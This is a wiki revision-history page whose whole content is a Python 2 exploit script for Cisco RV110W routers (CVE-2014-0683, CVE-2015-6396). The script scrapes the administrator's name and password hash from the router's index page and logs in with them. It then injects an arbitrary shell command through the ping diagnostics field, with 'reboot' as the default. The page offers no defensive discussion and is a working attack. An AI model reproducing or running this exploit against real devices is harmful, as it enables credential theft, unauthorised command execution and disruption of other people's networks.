https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2015-6396_Cisco_RV110W_Password_Disclosure_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E CVE-2015-6396 Cisco RV110W Password Disclosure 命令注入漏洞 - Revision history 2026-04-15T02:48:17Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2015-6396_Cisco_RV110W_Password_Disclosure_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1503&oldid=prev Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) #..." 2021-04-11T01:18:09Z <p>Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) #...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/env python2<br /> <br /> #####<br /> ## Cisco RV110W Password Disclosure and OS Command Execute.<br /> ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)<br /> <br /> # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute<br /> # Date: 2018-08<br /> # Exploit Author: RySh<br /> # Vendor Homepage: https://www.cisco.com/<br /> # Version: 1.1.0.9<br /> # Tested on: RV110W 1.1.0.9<br /> # CVE : CVE-2014-0683, CVE-2015-6396<br /> <br /> import os<br /> import sys<br /> import re<br /> import urllib<br /> import urllib2<br /> import getopt<br /> import json<br /> <br /> import ssl<br /> <br /> ssl._create_default_https_context = ssl._create_unverified_context<br /> <br /> ###<br /> # Usage: ./{script_name} 192.168.1.1 443 &quot;reboot&quot;<br /> ###<br /> <br /> if __name__ == &quot;__main__&quot;:<br /> IP = argv[1]<br /> PORT = argv[2]<br /> CMD = argv[3]<br /> <br /> # Get session key, Just access index page.<br /> url = 'https://' + IP + ':' + PORT + '/'<br /> req = urllib2.Request(url)<br /> result = urllib2.urlopen(req)<br /> res = result.read()<br /> <br /> # parse 'admin_pwd'! -- Get credits<br /> admin_user = re.search(r'.*(.*admin_name=\&quot;)(.*)\&quot;', res).group().split(&quot;\&quot;&quot;)[1]<br /> admin_pwd = re.search(r'.*(.*admin_pwd=\&quot;)(.{32})', res).group()[-32:]<br /> print &quot;Get Cred. Username = &quot; + admin_user + &quot;, PassHash = &quot; + admin_pwd<br /> <br /> # Get session_id by POST<br /> req2 = urllib2.Request(url + &quot;login.cgi&quot;)<br /> req2.add_header('Origin', url)<br /> req2.add_header('Upgrade-Insecure-Requests', 1)<br /> req2.add_header('Content-Type', 'application/x-www-form-urlencoded')<br /> req2.add_header('User-Agent',<br /> 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')<br /> req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')<br /> req2.add_header('Referer', url)<br /> req2.add_header('Accept-Encoding', 'gzip, deflate')<br /> req2.add_header('Accept-Language', 'en-US,en;q=0.9')<br /> req2.add_header('Cookie', 'SessionID=')<br /> data = {&quot;submit_button&quot;: &quot;login&quot;,<br /> &quot;submit_type&quot;: &quot;&quot;,<br /> &quot;gui_action&quot;: &quot;&quot;,<br /> &quot;wait_time&quot;: &quot;0&quot;,<br /> &quot;change_action&quot;: &quot;&quot;,<br /> &quot;enc&quot;: &quot;1&quot;,<br /> &quot;user&quot;: admin_user,<br /> &quot;pwd&quot;: admin_pwd,<br /> &quot;sel_lang&quot;: &quot;EN&quot;<br /> }<br /> r = urllib2.urlopen(req2, urllib.urlencode(data))<br /> resp = r.read()<br /> login_st = re.search(r'.*login_st=\d;', resp).group().split(&quot;=&quot;)[1]<br /> session_id = re.search(r'.*session_id.*\&quot;;', resp).group().split(&quot;\&quot;&quot;)[1]<br /> <br /> # Execute your commands via diagnose command parameter, default command is `reboot`<br /> req3 = urllib2.Request(url + &quot;apply.cgi;session_id=&quot; + session_id)<br /> req3.add_header('Origin', url)<br /> req3.add_header('Upgrade-Insecure-Requests', 1)<br /> req3.add_header('Content-Type', 'application/x-www-form-urlencoded')<br /> req3.add_header('User-Agent',<br /> 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')<br /> req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')<br /> req3.add_header('Referer', url)<br /> req3.add_header('Accept-Encoding', 'gzip, deflate')<br /> req3.add_header('Accept-Language', 'en-US,en;q=0.9')<br /> req3.add_header('Cookie', 'SessionID=')<br /> data_cmd = {&quot;submit_button&quot;: &quot;Diagnostics&quot;,<br /> &quot;change_action&quot;: &quot;gozila_cgi&quot;,<br /> &quot;submit_type&quot;: &quot;start_ping&quot;,<br /> &quot;gui_action&quot;: &quot;&quot;,<br /> &quot;traceroute_ip&quot;: &quot;&quot;,<br /> &quot;commit&quot;: &quot;1&quot;,<br /> &quot;ping_times&quot;: &quot;3 |&quot; + CMD + &quot;|&quot;,<br /> &quot;ping_size&quot;: &quot;64&quot;,<br /> &quot;wait_time&quot;: &quot;4&quot;,<br /> &quot;ping_ip&quot;: &quot;127.0.0.1&quot;,<br /> &quot;lookup_name&quot;: &quot;&quot;<br /> }<br /> r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))<br /> &lt;/pre&gt;</div> Pwnwiki